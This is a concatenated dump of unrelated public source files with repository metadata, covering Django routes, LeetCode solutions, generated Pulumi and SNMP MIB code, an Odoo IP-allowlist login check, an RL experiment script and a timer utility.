| 2020-12-08T22:14:34
| 2020-12-08T22:08:34
| null |
UTF-8
|
Python
| false
| false
| 1,408
|
py
|
# -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from recipes.views import RecipeWizard
from recipes.forms import RecipeFormStep1, RecipeFormStep2, RecipeFormStep3, IngredientForm
from django.forms.formsets import formset_factory
FORMS = [("first", RecipeFormStep1),
("second", formset_factory(IngredientForm)),
("third", RecipeFormStep3)]
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'povary.views.home', name='home'),
# url(r'^povary/', include('povary.foo.urls')),
url(r'add_recipe_to_box/(?P<recipe_slug>.*)/$', 'recipes.views.add_recipe_to_box', name='add_recipe_to_box'),
url(r'^$', 'recipes.views.recipe_list', name='recipe_list'),
url(r'^add/$', RecipeWizard.as_view(FORMS), name="recipe-add"),
url(r'^cakes/$', 'recipes.views.cake_recipe_list', name='cake_recipe_list'),
# url(r'^categories/(?P<category_slug>.*)/(?P<subcategory_slug>.*)/$',
# 'recipes.views.subcategory_details',
# name='subcategory_details'),
# url(r'^categories/(?P<category_slug>.*)/$', 'recipes.views.category_details', name='category_details'),
url(r'^ajax/(?P<recipe_slug>.*)/set_portion/$', 'recipes.views.set_portion', name='set_portion'),
url(r'^ajax/(?P<recipe_slug>.*)/wish/$', 'recipes.views.wish', name='wish'),
url(r'^(?P<recipe_slug>.*)/$', 'recipes.views.recipe_details', name='recipe_details'),
)
|
[
"me@torinasakura.name"
] |
me@torinasakura.name
|
9068990897aab8e31bc3528c0d1e5e71e9ac3716
|
ded13e921c8365c6113911a5834969ec3d33f989
|
/190/Reverse Bits.py
|
daf8020e90da61121938b47c386e6a71c42cebc4
|
[] |
no_license
|
ArrayZoneYour/LeetCode
|
b7b785ef0907640623e5ab8eec1b8b0a9d0024d8
|
d09f56d4fef859ca4749dc753d869828f5de901f
|
refs/heads/master
| 2021-04-26T23:03:10.026205
| 2018-05-09T15:49:08
| 2018-05-09T15:49:08
| 123,922,098
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
# /usr/bin/python
# coding: utf-8
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
bit_list = []
for i in range(32):
if n == 0:
bit_list.append(0)
else:
bit_list.append(n % 2)
n //= 2
size = 1
result = 0
for bit in bit_list[::-1]:
if bit != 0:
result += bit * size
size *= 2
return result
print(Solution().reverseBits(43261596))
|
[
"hustliyidong@gmail.com"
] |
hustliyidong@gmail.com
|
f88454fa9aec4c56926c2ca6e93a4e29b4d5ed11
|
2c32cf726e111b8625265c458feeaea436652e83
|
/pramp-condility-3month/mid-ll-03.py
|
1e8be57a8c2ad51d2eaf8186bda15d8dd284e8ed
|
[] |
no_license
|
minhthe/practice-algorithms-and-data-structures
|
6fa3bf98e8e2fe98f4e32419fb797b1df4400364
|
488a82dd3a0c797859a6c9e1195d6d579d676073
|
refs/heads/master
| 2021-05-16T23:01:20.026475
| 2020-09-23T04:17:13
| 2020-09-23T04:17:13
| 250,505,610
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 281
|
py
|
'''https://leetcode.com/problems/middle-of-the-linked-list/'''
class Solution:
def middleNode(self, head: ListNode) -> ListNode:
slow = head
fast = head
while slow.next :
slow = slow.next
fast = fast.next.next
if not fast or not fast.next: return slow
return slow
|
[
"minhthe.007@gmail.com"
] |
minhthe.007@gmail.com
|
1bfe256e98b3819a009084e61cbab623b1b98742
|
2a68b03c923119cc747c4ffcc244477be35134bb
|
/Algorithm/BFS/cutOffTreesForGolf.py
|
2a98a13b8ff88d702b43e4e35845dcc69aa477f3
|
[] |
no_license
|
QitaoXu/Lintcode
|
0bce9ae15fdd4af1cac376c0bea4465ae5ea6747
|
fe411a0590ada6a1a6ae1166c86c585416ac8cda
|
refs/heads/master
| 2020-04-24T20:53:27.258876
| 2019-09-24T23:54:59
| 2019-09-24T23:54:59
| 172,259,064
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,554
|
py
|
from collections import deque
DIRECTIONS = [(-1, 0), (1, 0), (0, 1), (0, - 1)]
class Node:
def __init__(self, x, y, h):
self.x = x
self.y = y
self.h = h
def __lt__(self, other):
return self.h < other.h
class Solution:
"""
@param forest: a list of integers
@return: return a integer
"""
def cutOffTree(self, forest):
# write your code here
if not forest or not forest[0]:
return 0
m, n = len(forest), len(forest[0])
trees = []
for i in range(m):
for j in range(n):
if forest[i][j] > 1:
trees.append(Node(i, j, forest[i][j]))
trees.sort()
total = 0
start = Node(0, 0, forest[0][0])
while trees:
tree = trees[0]
del trees[0]
step = self.minStep(forest, start, tree, m, n)
if step < 0:
return -1
total += step
start = tree
return total
def minStep(self, forest, start, tree, m, n):
queue = deque()
seen = set()
queue.append(start)
seen.add((start.x, start.y))
step = -1
while queue:
size = len(queue)
step += 1
for _ in range(size):
node = queue.popleft()
if node.x == tree.x and node.y == tree.y:
return step
for dx, dy in DIRECTIONS:
nx, ny = node.x + dx, node.y + dy
if not self.is_valid(forest, nx, ny):
continue
if (nx, ny) in seen:
continue
queue.append(Node(nx, ny, forest[nx][ny]))
seen.add((nx, ny))
return -1
def is_valid(self, forest, x, y):
m, n = len(forest), len(forest[0])
if x < 0 or x >= m or y < 0 or y >= n:
return False
if forest[x][y] == 0:
return False
return True
|
[
"jeremyxuqitao@outlook.com"
] |
jeremyxuqitao@outlook.com
|
bb66bf071a75efcfd3911bfff82f02abb6f859f3
|
d8183ea32f7e041dc4094cb955c075586bf66b73
|
/subscriptions/api/urls.py
|
b63a5e68b48dfb2f6ec1e280cb64cdad63d00b63
|
[
"BSD-2-Clause"
] |
permissive
|
mjumbewu/django-subscriptions
|
e8426ff510f06268c3f4151e7d71ffad59fa115b
|
78a35742ec5062380aded053b64fd96cba677dac
|
refs/heads/master
| 2016-09-05T18:03:22.761915
| 2013-04-01T18:05:08
| 2013-04-01T18:05:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 289
|
py
|
from django.conf.urls.defaults import patterns, include, url
from subscriptions.api.views import SubscriptionIndex, ContentFeedRecordIndex
urlpatterns = patterns('',
url('^subscriptions/$', SubscriptionIndex.as_view()),
url('^feed_records/$', ContentFeedRecordIndex.as_view()),
)
|
[
"mjumbewu@gmail.com"
] |
mjumbewu@gmail.com
|
9cdaad47d5357ac4e8efec69e5a276d9740b076e
|
c77a40408bc40dc88c466c99ab0f3522e6897b6a
|
/Python_fundamentals/Lists_basics/InvertValues.py
|
4f376e4458c8f0257c55551b39bf912e393e5243
|
[] |
no_license
|
vbukovska/SoftUni
|
3fe566d8e9959d390a61a4845381831929f7d6a3
|
9efd0101ae496290313a7d3b9773fd5111c5c9df
|
refs/heads/main
| 2023-03-09T17:47:20.642393
| 2020-12-12T22:14:27
| 2021-02-16T22:14:37
| 328,805,705
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
string = input()
list_of_string = string.split(' ')
reverse_list = []
for i in range(len(list_of_string)):
reverse_list.append(int(list_of_string[i]) * -1)
print(reverse_list)
|
[
"vbukovska@yahoo.com"
] |
vbukovska@yahoo.com
|
508adf8642b9920d2152095cd5a761b3ab2e54c0
|
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
|
/sdk/python/pulumi_azure_native/recoveryservices/v20210201/get_protection_policy.py
|
ecf4c141423f4c2b9f265781df528fc03ccf1e76
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
bpkgoud/pulumi-azure-native
|
0817502630062efbc35134410c4a784b61a4736d
|
a3215fe1b87fba69294f248017b1591767c2b96c
|
refs/heads/master
| 2023-08-29T22:39:49.984212
| 2021-11-15T12:43:41
| 2021-11-15T12:43:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,829
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetProtectionPolicyResult',
'AwaitableGetProtectionPolicyResult',
'get_protection_policy',
'get_protection_policy_output',
]
@pulumi.output_type
class GetProtectionPolicyResult:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
"""
def __init__(__self__, e_tag=None, id=None, location=None, name=None, properties=None, tags=None, type=None):
if e_tag and not isinstance(e_tag, str):
raise TypeError("Expected argument 'e_tag' to be a str")
pulumi.set(__self__, "e_tag", e_tag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="eTag")
def e_tag(self) -> Optional[str]:
"""
Optional ETag.
"""
return pulumi.get(self, "e_tag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id represents the complete path to the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name associated with the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> Any:
"""
ProtectionPolicyResource properties
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type represents the complete path of the form Namespace/ResourceType/ResourceType/...
"""
return pulumi.get(self, "type")
class AwaitableGetProtectionPolicyResult(GetProtectionPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetProtectionPolicyResult(
e_tag=self.e_tag,
id=self.id,
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
type=self.type)
def get_protection_policy(policy_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
vault_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetProtectionPolicyResult:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
:param str policy_name: Backup policy information to be fetched.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
__args__ = dict()
__args__['policyName'] = policy_name
__args__['resourceGroupName'] = resource_group_name
__args__['vaultName'] = vault_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:recoveryservices/v20210201:getProtectionPolicy', __args__, opts=opts, typ=GetProtectionPolicyResult).value
return AwaitableGetProtectionPolicyResult(
e_tag=__ret__.e_tag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
properties=__ret__.properties,
tags=__ret__.tags,
type=__ret__.type)
@_utilities.lift_output_func(get_protection_policy)
def get_protection_policy_output(policy_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
vault_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetProtectionPolicyResult]:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
:param str policy_name: Backup policy information to be fetched.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
...
|
[
"noreply@github.com"
] |
bpkgoud.noreply@github.com
|
be11b741bfcdd7a38ab0381a2686283f96a1864b
|
85a9ffeccb64f6159adbd164ff98edf4ac315e33
|
/pysnmp-with-texts/PCUBE-SMI.py
|
057c4bae47ebfa759260a8448e4e0cd9d353529d
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
agustinhenze/mibs.snmplabs.com
|
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
refs/heads/master
| 2020-12-26T12:41:41.132395
| 2019-08-16T15:51:41
| 2019-08-16T15:53:57
| 237,512,469
| 0
| 0
|
Apache-2.0
| 2020-01-31T20:41:36
| 2020-01-31T20:41:35
| null |
UTF-8
|
Python
| false
| false
| 3,457
|
py
|
#
# PySNMP MIB module PCUBE-SMI (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/PCUBE-SMI
# Produced by pysmi-0.3.4 at Wed May 1 12:11:29 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
enterprises, ObjectIdentity, iso, Counter32, Unsigned32, Counter64, Integer32, ModuleIdentity, TimeTicks, Gauge32, IpAddress, MibIdentifier, Bits, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "ObjectIdentity", "iso", "Counter32", "Unsigned32", "Counter64", "Integer32", "ModuleIdentity", "TimeTicks", "Gauge32", "IpAddress", "MibIdentifier", "Bits", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
pcube = ModuleIdentity((1, 3, 6, 1, 4, 1, 5655))
pcube.setRevisions(('2002-01-14 20:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: pcube.setRevisionsDescriptions(('Initial version of this MIB module.',))
if mibBuilder.loadTexts: pcube.setLastUpdated('200201142000Z')
if mibBuilder.loadTexts: pcube.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: pcube.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: cs-sce@cisco.com')
if mibBuilder.loadTexts: pcube.setDescription('The Structure of Management Information for the Pcube enterprise.')
pcubeProducts = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 1))
if mibBuilder.loadTexts: pcubeProducts.setStatus('current')
if mibBuilder.loadTexts: pcubeProducts.setDescription('pcubeProducts is the root OBJECT IDENTIFIER from which sysObjectID values are assigned. Actual values are defined in PCUBE-PRODUCTS-MIB.')
pcubeModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 2))
if mibBuilder.loadTexts: pcubeModules.setStatus('current')
if mibBuilder.loadTexts: pcubeModules.setDescription('pcubeModules provides a root object identifier from which MODULE-IDENTITY values may be assigned.')
pcubeMgmt = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 3))
if mibBuilder.loadTexts: pcubeMgmt.setStatus('current')
if mibBuilder.loadTexts: pcubeMgmt.setDescription('pcubeMgmt is the main subtree for new MIB development.')
pcubeWorkgroup = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 4))
if mibBuilder.loadTexts: pcubeWorkgroup.setStatus('current')
if mibBuilder.loadTexts: pcubeWorkgroup.setDescription("pcubeWorkgroup is the main subtree for objects and events of P-Cube's products.")
mibBuilder.exportSymbols("PCUBE-SMI", PYSNMP_MODULE_ID=pcube, pcubeMgmt=pcubeMgmt, pcubeProducts=pcubeProducts, pcubeModules=pcubeModules, pcubeWorkgroup=pcubeWorkgroup, pcube=pcube)
|
[
"dcwangmit01@gmail.com"
] |
dcwangmit01@gmail.com
|
3df115b3dffbcbdc55a87e74face40f87c7cca8f
|
00504f069d4f0eb93ed8777b627a6cd7de0fe94d
|
/10.0/auth_allowed_ips/__init__.py
|
4f27000c587c01350a8ffde35f37c6c282bb6e4c
|
[] |
no_license
|
Gofekra/odoo-2
|
6e1a688a9e04cc0ecd1ca91ad7fca004194f1c4a
|
a2f870a695663fe505451b6d97692433a4ea2b1d
|
refs/heads/master
| 2021-04-09T13:32:46.994819
| 2018-03-13T07:52:55
| 2018-03-13T07:52:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,733
|
py
|
# coding: utf-8
import re
import logging
from odoo import models, fields, SUPERUSER_ID, api
_logger = logging.getLogger(__name__)
class User(models.Model):
_inherit = 'res.users'
allowed_ips = fields.Text(string='Allowed IPs', help=u"""正则匹配
如:^192\.168\.2\.\d{1,3}$, 支持多个正则,每一个正则单独一行。满足任意一行即可通过。
""")
@classmethod
def authenticate(cls, db, login, password, user_agent_env):
uid = super(User, cls).authenticate(db, login, password, user_agent_env)
if uid:
with cls.pool.cursor() as cr:
self = api.Environment(cr, SUPERUSER_ID, {})[cls._name]
user = self.browse(uid)
if hasattr(user, 'allowed_ips') and user.allowed_ips:
addr = user_agent_env['REMOTE_ADDR']
if not any(re.match(line, addr) for line in user.allowed_ips.splitlines()):
_logger.warn('User login blocked cause of the remote_addr %s not match allowed_ips %s',
user_agent_env['REMOTE_ADDR'], user.allowed_ips)
uid = False
# 在super方法中,已经普通密码验证成功,且创建了登录成功的日志,
# 但是在上面被IP限制,修改此login最后一条的日志和note。
Log = api.Environment(cr, SUPERUSER_ID, {})['auth_login_log.log']
Log.search([('login_account', '=', login)], limit=1, order='id desc').write({
'note': u'IP受限',
'login_status': 'e',
})
return uid
|
[
"guwenfengvip@163.com"
] |
guwenfengvip@163.com
|
760b0eb4c5e3ffc5e8dc4d8b21479bb959617a91
|
0a28bcde2499e6a41e16d88ed62cd2e80a5b464d
|
/hb_quant/huobi/model/subuser/trade_market.py
|
74d22b7034eb44acc3ad53c865621798e9a56b5f
|
[
"MIT"
] |
permissive
|
wenli135/Binance-volatility-trading-bot
|
2cfe66007294b13a89b16d1622d50ce1615f1d66
|
75a03ad61df0e95492128fb6f1f419d4dc256ab3
|
refs/heads/main
| 2023-06-13T06:40:43.855256
| 2021-07-01T02:03:25
| 2021-07-01T02:03:25
| 373,853,320
| 0
| 0
|
MIT
| 2021-06-04T13:38:26
| 2021-06-04T13:38:26
| null |
UTF-8
|
Python
| false
| false
| 658
|
py
|
class TradeMarket:
"""
The trade information with price and amount etc.
:member
subUid: sub user ID.
accountType:
activation: sub user account state for given accountType.
"""
def __init__(self):
self.sub_uid = ""
self.account_type = ""
self.activation = ""
def print_object(self, format_data=""):
from huobi.utils.print_mix_object import PrintBasic
PrintBasic.print_basic(self.sub_uid, format_data + "subUid")
PrintBasic.print_basic(self.account_type, format_data + "accountType")
PrintBasic.print_basic(self.activation, format_data + "activation")
|
[
"wenli@quchaogu.com"
] |
wenli@quchaogu.com
|
214b3914aab920368717b8b7efce2aa7628cfc34
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/pa3/benchmarks/tree-491.py
|
b791356b5b8ce529fe2fb5cf44c992b2430b4224
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,451
|
py
|
# Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
$FuncBodyMember
b = TreeNode()
b.value = x
return b
# Input parameters
n:int = 100
c:int = 4
# Data
t:Tree = None
i:int = 0
k:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
e73e71b19defdf97b66220f6612d3d90b742c593
|
954e69e23e10e18d6f8ac721d8e42d6aabceb9ab
|
/topytorch_all.py
|
c9c65555052d46e5aa3dce65220f004f795fe386
|
[] |
no_license
|
jie311/2018--ZJUAI--PyramidBoxDetector
|
53fc001d6e60fdc67d22ab0864ed1b574c53c182
|
cc9b87b5082df65704a24117ff7136f9d077f49e
|
refs/heads/master
| 2022-09-09T02:30:05.219093
| 2020-05-28T07:37:59
| 2020-05-28T07:37:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,230
|
py
|
# pdpd输入格式的txt
pdfile = './final_all.txt'
# pytorch输入格式的txt
ptfile = './final_all_pt.txt'
f = open(pdfile, 'r')
f_pt = open(ptfile, 'w')
lines = f.readlines()
i = 0
rect = 0
total = 0
while i < len(lines):
if 'jpg' in lines[i]:
im_id = lines[i].rstrip()
# print(im_id)
num = int(lines[i + 1].rstrip())
#
i = i + 2
box = []
bad = 0
for j in range(num):
x1, y1, w, h = map(int, lines[i].rstrip().split(' ')[0:4])
if w != h:
print(im_id)
print(w, h)
rect += 1
if w == 0 or h == 0:
# print(im_id)
bad += 1
i = i + 1
continue
else:
box.append([x1, y1, w, h])
i = i + 1
num = num - bad
total += num
if num > 0:
f_pt.write(im_id)
f_pt.write(' {0}'.format(num))
for [x1, y1, w, h] in box:
f_pt.write(' {0} {1} {2} {3}'.format(x1, y1, w, h))
f_pt.write('\n')
else:
pass
else:
i = i + 1
f_pt.close()
f.close()
print(rect)
print(total)
|
[
"2755289083@qq.com"
] |
2755289083@qq.com
|
249ab99aec490d4e6164883dbd8dea5220340a17
|
19d6bddc562b8cc3c7a6e67465f7601c74979e05
|
/results/190902/failed/lifelong-stochastic-tight-big_h-11_w-11/stochastic-tight-big.py
|
9b63dc6b158b73d05568948f1f0b3b6fa474c43e
|
[] |
no_license
|
SuReLI/llrl
|
3bca1d1c755e5c59a5d242c18df997ed17f546d0
|
5f581cdded3cdecf69a8af76dc624494d82a4034
|
refs/heads/master
| 2023-01-08T04:04:28.358563
| 2020-11-06T10:27:33
| 2020-11-06T10:27:33
| 169,303,041
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,358
|
py
|
"""
Lifelong RL experiment in constant transition function setting
"""
import numpy as np
from llrl.agents.rmax import RMax
from llrl.agents.lrmax import LRMax
from llrl.agents.maxqinit import MaxQInit
from llrl.agents.lrmaxqinit import LRMaxQInit
from llrl.utils.env_handler import make_env_distribution
from llrl.experiments import run_agents_lifelong
def experiment():
# Parameters
gamma = .9
env_distribution = make_env_distribution(env_class='stochastic-tight-big', env_name='stochastic-tight-big', gamma=gamma)
actions = env_distribution.get_actions()
n_known = 10
p_min = 1. / 5.
epsilon_q = .01
epsilon_m = .01
delta = .1
r_max = 1.
v_max = 1.
n_states = 4
max_mem = 20
# Agents
rmax = RMax(actions=actions, gamma=gamma, r_max=r_max, v_max=v_max, deduce_v_max=False, n_known=n_known,
deduce_n_known=False, epsilon_q=epsilon_q, epsilon_m=epsilon_m, name='RMax')
lrmax = LRMax(actions=actions, gamma=gamma, r_max=r_max, v_max=v_max, deduce_v_max=False, n_known=n_known,
deduce_n_known=False, epsilon_q=epsilon_q, epsilon_m=epsilon_m, delta=delta, n_states=n_states,
max_memory_size=max_mem, prior=None, estimate_distances_online=True,
min_sampling_probability=p_min, name='LRMax')
lrmaxprior = LRMax(actions=actions, gamma=gamma, r_max=r_max, v_max=v_max, deduce_v_max=False, n_known=n_known,
deduce_n_known=False, epsilon_q=epsilon_q, epsilon_m=epsilon_m, delta=delta, n_states=n_states,
max_memory_size=max_mem, prior=0.2, estimate_distances_online=True,
min_sampling_probability=p_min, name='LRMax(Dmax=0.2)')
maxqinit = MaxQInit(actions=actions, gamma=gamma, r_max=r_max, v_max=v_max, deduce_v_max=False, n_known=n_known,
deduce_n_known=False, epsilon_q=epsilon_q, epsilon_m=epsilon_m, delta=delta, n_states=n_states,
min_sampling_probability=p_min, name='MaxQInit')
lrmaxqinit = LRMaxQInit(actions=actions, gamma=gamma, r_max=r_max, v_max=v_max, deduce_v_max=False, n_known=n_known,
deduce_n_known=False, epsilon_q=epsilon_q, epsilon_m=epsilon_m, delta=delta,
n_states=n_states, max_memory_size=max_mem, prior=None, estimate_distances_online=True,
min_sampling_probability=p_min, name='LRMaxQInit')
lrmaxqinitprior = LRMaxQInit(actions=actions, gamma=gamma, r_max=r_max, v_max=v_max, deduce_v_max=False, n_known=n_known,
deduce_n_known=False, epsilon_q=epsilon_q, epsilon_m=epsilon_m, delta=delta,
n_states=n_states, max_memory_size=max_mem, prior=0.2, estimate_distances_online=True,
min_sampling_probability=p_min, name='LRMaxQInit(Dmax=0.2)')
agents_pool = [rmax, lrmax, lrmaxprior, maxqinit, lrmaxqinit, lrmaxqinitprior]
# Run
run_agents_lifelong(agents_pool, env_distribution, n_instances=2, n_tasks=80, n_episodes=80, n_steps=100,
reset_at_terminal=False, open_plot=False, plot_title=True, do_run=True, do_plot=True,
parallel_run=True, n_processes=None)
if __name__ == '__main__':
np.random.seed(1993)
experiment()
|
[
"erwan.lc2@gmail.com"
] |
erwan.lc2@gmail.com
|
6dcec5b996d8a262227be3e7686fc90e5ef05185
|
fc5816b2ba73124a4744d08b7acf8f62ced66640
|
/timer.py
|
ec255d136560e92c284404460b1a319a77e14567
|
[] |
no_license
|
rkdarst/fitz
|
51e2b9e28a36ffe2b58f49ff36a4593ca55c5045
|
b2ac6aaff47217f40ac39042d27ffd130b8a36a5
|
refs/heads/master
| 2016-09-05T17:20:52.187546
| 2015-05-16T10:49:14
| 2015-05-16T10:49:14
| 22,289,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,755
|
py
|
# Richard Darst, 2006
"""Provides a stopwatch for code.
Classes
=======
There is a class defined called Timer. It has the following methods:
__init__ -- argument is `clock`, which is the timing function to use
for this timer. It defaults to proctime.
reset -- zero the stopwatch. The getrusage system call is zeroed when
the code starts (and the timer keeps this zero initially),
but calling reset() zeros it. Zeroing is done by recording
the current time and subtracting this out from future calls.
time -- returns the time since the last reset
lap -- return the time from the last reset, and reset it.
Global functions
================
t -- an automatically created instance of timer, using `proctime`.
start-- ~\ The methods on `t` are bound to the global namespace,
time -- > so timer.start(), etc, can be used if this what you
reset-- _/ need.
The module includes various clock functions to use, such as
`realtime`, `proctime`, `usertime`, and `systime`.
"""
import resource
import time as timemodule
def systime():
"""Time spent executing system calls.
Time spend doing things like disk access, IO, etc.
Uses the system call getrusage().ru_stime
"""
return resource.getrusage(resource.RUSAGE_SELF).ru_stime
def usertime():
"""Time spent executing code in user mode.
Time spent doing things like adding numbers.
Uses the system call getrusage().ru_utime
"""
return resource.getrusage(resource.RUSAGE_SELF).ru_utime
def proctime():
"""Time spent by processor executing code
sys + user time
"""
r = resource.getrusage(resource.RUSAGE_SELF)
return r.ru_utime+r.ru_stime
def realtime():
"""Time on a clock on the wall.
If your processor isn't busy doing other things, this will be the
best to find how much time your code takes.
time.time(), which uses the system call gettimeofday() for greater
accuracy when avaliable.
"""
return timemodule.time()
class Timer:
_starttime = 0.
def __init__(self, clock=proctime):
"""Create rusage object using a certain timing function.
The argument `clock` is the clock function to use. Default is
proctime.
"""
self._clock = clock
def reset(self):
"""Reset the timer
"""
self._starttime = self._clock()
def time(self):
"""Return time since last reset
"""
return self._clock() - self._starttime
def lap(self):
"""Reset and return time since last reset
"""
oldtime = self._clock() - self._starttime
self._starttime = self._clock()
return oldtime
t = Timer()
reset = t.reset
time = t.time
lap = t.lap
|
[
"rkd@zgib.net"
] |
rkd@zgib.net
|
16a3fc07f5076c8209e850bf5fae219bc5f9d24a
|
a718de5d51c8d430e791aca6092669c04548fd64
|
/Census-Analyser-master/census_analyser/test_census.py
|
a1d7d9093033bac09637e510c928fb25d4e80fa1
|
[] |
no_license
|
santoshikalaskar/Basic_Advance_python_program
|
d0fef4134ed4b14f84ff05a3b37e1773c111a2d1
|
84df5c336d5304c3c727102194ba62417640643a
|
refs/heads/master
| 2023-01-22T15:06:24.909145
| 2020-12-02T14:01:29
| 2020-12-02T14:01:29
| 314,511,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,451
|
py
|
import pytest
